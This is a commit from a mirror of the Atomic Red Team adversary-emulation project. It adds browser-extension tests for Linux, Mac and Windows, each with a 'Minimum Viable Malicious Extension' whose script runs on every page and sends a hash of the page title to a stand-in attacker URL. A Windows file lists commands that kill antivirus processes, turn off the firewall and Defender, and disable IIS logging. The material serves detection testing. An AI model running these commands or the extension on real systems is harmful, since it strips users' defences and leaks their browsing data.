infosecn1nja
/
atomic-red-team
mirror of https://github.com/infosecn1nja/atomic-red-team.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into master

patch-7
ahogue-atlassian 2018-02-27 14:04:13 +11:00 committed by GitHub
parent 1347bc88dd d58a87f670
commit fb99ca3f6f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
16 changed files with 343 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
Linux/Collection/Browser_Extensions.md Normal file
View File

@ -0,0 +1,24 @@
## Browser Extensions
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
### Chrome (Developer Mode)
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
Then click 'Select'
### Chrome (Chrome Web Store)
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
### Firefox
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
Then click 'Open'

37
Linux/Payloads/Browser_Extension/inline.js Normal file
View File

@ -0,0 +1,37 @@
function exfil(str) {
// take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
// other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
// and probably a thousand other methods. But this one is easy.
var buffer = new TextEncoder("utf-8").encode(str);
return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
}
function callUrl(buffer) {
// this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
// except it's example.com so w/e
var digest = hex(buffer);
var url = "https://example.com/" + digest;
console.log("Exfiltrating data to " + url)
var xmlHttp = new XMLHttpRequest();
xmlHttp.open( "GET", url, true);
xmlHttp.send( null);
return digest;
}
function hex(buffer) {
// nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
var hexCodes = [];
var view = new DataView(buffer);
for (var i = 0; i < view.byteLength; i += 4) {
var value = view.getUint32(i)
var stringValue = value.toString(16)
var padding = '00000000'
var paddedValue = (padding + stringValue).slice(-padding.length)
hexCodes.push(paddedValue);
}
var athing = hexCodes.join("");
return hexCodes.join("");
}
// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
var digest = exfil(document.title);

16
Linux/Payloads/Browser_Extension/manifest.json Normal file
View File

@ -0,0 +1,16 @@
{
"name": "Minimum Viable Malicious Extension",
"description": "Base Level Extension",
"version": "1.0",
"manifest_version": 2,
"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": [
"inline.js"
]
}
]
}

24
Linux/Persistence/Browser_Extensions.md Normal file
View File

@ -0,0 +1,24 @@
## Browser Extensions
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
### Chrome (Developer Mode)
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
Then click 'Select'
### Chrome (Chrome Web Store)
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
### Firefox
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
Then click 'Open'

16
Linux/README.md
View File

@ -4,14 +4,14 @@
|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
| [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Command-Line Interface](Execution/Command-Line_Interface.md) | Audio Capture | Automated Exfiltration | Commonly Used Port |
| Bootkit | [Setuid and Setgid](Privilege_Escalation/Setuid_and_Setgid.md) | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
| [Cron Job](Persistence/Cron_Job.md) | Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | Clipboard Data | Data Encrypted | Connection Proxy |
| Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |
| Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data from Local System | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol |
| Redundant Access | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding |
| [Trap](Persistence/Trap.md) | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation |
| Valid Accounts | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels |
| Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels |
| | | Install Root Certificate | | System Owner/User Discovery | | | | | Multiband Communication |
| [Browser Extensions](Persistence/Browser_Extensions.md)| Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy |
| [Cron Job](Persistence/Cron_Job.md) | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Clipboard Data | Data Transfer Size Limits | Custom Command and Control Protocol |
| Hidden Files and Directories | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol |
| Rc.common | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding |
| Redundant Access | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation |
| [Trap](Persistence/Trap.md) | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Data from Removable Media | Exfiltration Over Physical Medium | Fallback Channels |
| Valid Accounts | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Input Capture | Scheduled Transfer | Multi-Stage Channels |
| Web Shell | | Install Root Certificate | | System Owner/User Discovery | | | Screen Capture | | Multiband Communication |
| | | Masquerading | | | | | | | Multilayer Encryption |
| | | Redundant Access | | | | | | | Remote File Copy |
| | | Scripting | | | | | | | Standard Application Layer Protocol |

24
Mac/Collection/Browser_Extensions.md Normal file
View File

@ -0,0 +1,24 @@
## Browser Extensions
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
### Chrome (Developer Mode)
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
Then click 'Select'
### Chrome (Chrome Web Store)
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
### Firefox
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
Then click 'Open'

37
Mac/Payloads/Browser_Extension/inline.js Normal file
View File

@ -0,0 +1,37 @@
function exfil(str) {
// take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
// other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
// and probably a thousand other methods. But this one is easy.
var buffer = new TextEncoder("utf-8").encode(str);
return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
}
function callUrl(buffer) {
// this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
// except it's example.com so w/e
var digest = hex(buffer);
var url = "https://example.com/" + digest;
console.log("Exfiltrating data to " + url)
var xmlHttp = new XMLHttpRequest();
xmlHttp.open( "GET", url, true);
xmlHttp.send( null);
return digest;
}
function hex(buffer) {
// nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
var hexCodes = [];
var view = new DataView(buffer);
for (var i = 0; i < view.byteLength; i += 4) {
var value = view.getUint32(i)
var stringValue = value.toString(16)
var padding = '00000000'
var paddedValue = (padding + stringValue).slice(-padding.length)
hexCodes.push(paddedValue);
}
var athing = hexCodes.join("");
return hexCodes.join("");
}
// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
var digest = exfil(document.title);

16
Mac/Payloads/Browser_Extension/manifest.json Normal file
View File

@ -0,0 +1,16 @@
{
"name": "Minimum Viable Malicious Extension",
"description": "Base Level Extension",
"version": "1.0",
"manifest_version": 2,
"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": [
"inline.js"
]
}
]
}

24
Mac/Persistence/Browser_Extensions.md Normal file
View File

@ -0,0 +1,24 @@
## Browser Extensions
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
### Chrome (Developer Mode)
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
Then click 'Select'
### Chrome (Chrome Web Store)
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
### Firefox
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
Then click 'Open'

2
Mac/README.md
View File

@ -3,7 +3,7 @@
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|------------------------------|-------------------------------|---------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
| [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Dylib Hijacking | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | [AppleScript](Execution/AppleScript.md) | [AppleScript](Execution/AppleScript.md) | Audio Capture | Automated Exfiltration | Commonly Used Port |
| Browser Extensions | Exploitation of Vulnerability | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
| [Browser Extensions](Persistence/Browser_Extensions.md) | Exploitation of Vulnerability | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
| [Create Account](Persistence/Create_Account.md) | Launch Daemon | Code Signing | Credentials in Files | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Browser Extensions | Data Encrypted | Connection Proxy |
| Dylib Hijacking | Plist Modification | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md) | Exploitation of Vulnerability | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | [Logon Scripts](Persistence/Logon_Scripts.md) | Launchctl | Clipboard Data | Data Transfer Size Limits | [Custom Command and Control Protocol](Command_and_Control/Custom_Command_and_Control_Protocol.md) |
| Hidden Files and Directories | Process Injection | Exploitation of Vulnerability | Input Capture | [Network Share Discovery](Discovery/Network_Share_Discovery.md) | Remote File Copy | Local Job Scheduling | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol |

24
Windows/Collection/Browser_Extensions.md Normal file
View File

@ -0,0 +1,24 @@
## Browser Extensions
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
### Chrome (Developer Mode)
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
Then click 'Select'
### Chrome (Chrome Web Store)
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
### Firefox
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
Then click 'Open'

28
Windows/Defense_Evasion/Disabling_Security_Tools.md Normal file
View File

@ -0,0 +1,28 @@
# Disabling Security Tools
MITRE ATT&CK Technique: [T1089](https://attack.mitre.org/wiki/Technique/T1089)
## Terminate Anti-Virus Processes
`Taskkill /F /IM avprocess.exe`
## Disable Firewall
`netsh firewall set opmode disable`
## Stop Windows Security Center
`net stop wscsvc`
## Stop Windows Defender
### Windows 7/8
`net stop windefend`
### Windows 10
`PS > Set-MpPreference -DisableRealtimeMonitoring $true`
## Disable Default Web Site Logging IIS 7
### Disable Default Web Site Logging IIS 7
`%windir%\system32\inetsrv\appcmd.exe set config "Default Web Site" -section:system.webServer/httpLogging /dontLog:"True" /commit:apphost`
### Restart Default Web Site IIS 7
`%windir%\system32\inetsrv\appcmd.exe stop site /site.name:"Default Web Site" && %windir%\system32\inetsrv\appcmd.exe start site /site.name:"Default Web Site"`

37
Windows/Payloads/Browser_Extension/inline.js Normal file
View File

@ -0,0 +1,37 @@
function exfil(str) {
// take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
// other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
// and probably a thousand other methods. But this one is easy.
var buffer = new TextEncoder("utf-8").encode(str);
return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
}
function callUrl(buffer) {
// this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
// except it's example.com so w/e
var digest = hex(buffer);
var url = "https://example.com/" + digest;
console.log("Exfiltrating data to " + url)
var xmlHttp = new XMLHttpRequest();
xmlHttp.open( "GET", url, true);
xmlHttp.send( null);
return digest;
}
function hex(buffer) {
// nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
var hexCodes = [];
var view = new DataView(buffer);
for (var i = 0; i < view.byteLength; i += 4) {
var value = view.getUint32(i)
var stringValue = value.toString(16)
var padding = '00000000'
var paddedValue = (padding + stringValue).slice(-padding.length)
hexCodes.push(paddedValue);
}
var athing = hexCodes.join("");
return hexCodes.join("");
}
// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
var digest = exfil(document.title);

16
Windows/Payloads/Browser_Extension/manifest.json Normal file
View File

@ -0,0 +1,16 @@
{
"name": "Minimum Viable Malicious Extension",
"description": "Base Level Extension",
"version": "1.0",
"manifest_version": 2,
"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": [
"inline.js"
]
}
]
}

24
Windows/Persistence/Browser_Extensions.md Normal file
View File

@ -0,0 +1,24 @@
## Browser Extensions
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
### Chrome (Developer Mode)
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
Then click 'Select'
### Chrome (Chrome Web Store)
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
### Firefox
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
Then click 'Open'

6
Windows/README.md
View File

@ -4,14 +4,14 @@
|-------------------------------------------------------|----------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | [Account Manipulation](Credential_Access/Account_Manipulation.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | Command-Line Interface | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port |
| AppCert DLLs | Accessibility Features | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Distributed Component Object Model | Dynamic Data Exchange | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media |
| [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | Browser Extensions | Data Encrypted | Connection Proxy |
| [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy |
| [Application Shimming](Persistence/Application_Shimming.md) | AppInit DLLs | Code Signing | [Credentials in Files](Credential_Access/Credentials_in_Files.md) | Network Service Scanning | Logon Scripts | Execution through Module Load | [Clipboard Data](Collection/Clipboard_Data.md) | Data Transfer Size Limits | Custom Command and Control Protocol |
| [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | Pass the Hash | Graphical User Interface | Data Staged | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
| Bootkit | [Bypass User Account Control](Privilege_Escalation/Bypass_User_Account_Control.md) | Component Object Model Hijacking | Forced Authentication | Peripheral Device Discovery | Pass the Ticket | [InstallUtil](Execution/InstallUtil.md) | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding |
| Browser Extensions | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation |
| [Browser Extensions](Persistence/Browser_Extensions.md) | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation |
| [Change Default File Association](Persistence/Change_Default_File_Association.md) | Exploitation of Vulnerability | DLL Side-Loading | [Input Capture](Collection/Input_Capture.md) | Process Discovery | Remote File Copy | [Mshta](Execution/Mshta.md) | Data from Removable Media | Exfiltration Over Physical Medium | Domain Fronting |
| Component Firmware | Extra Window Memory Injection | [Deobfuscate/Decode Files or Information](Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md) | LLMNR/NBT-NS Poisoning | [Query Registry](Discovery/Query_Registry.md) | Remote Services | [PowerShell](Execution/PowerShell.md) | Email Collection | Scheduled Transfer | Fallback Channels |
| [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | Disabling Security Tools | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels |
| [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md) | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels |
| [Create Account](Credential_Access/Create_Account.md) | Hooking | Exploitation of Vulnerability | Password Filter DLL | [Security Software Discovery](Discovery/Security_Software_Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Man in the Browser | | Multi-hop Proxy |
| DLL Search Order Hijacking | Image File Execution Options Injection | Extra Window Memory Injection | Private Keys | [System Information Discovery](Discovery/System_Information_Discovery.md) | Taint Shared Content | [Rundll32](Execution/rundll32.md) | Screen Capture | | Multiband Communication |
| External Remote Services | [New Service](Persistence/New_Service.md) | [File Deletion](Defense_Evasion/File_Deletion.md) | Replication Through Removable Media | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | Third-party Software | Scheduled Task | Video Capture | | Multilayer Encryption |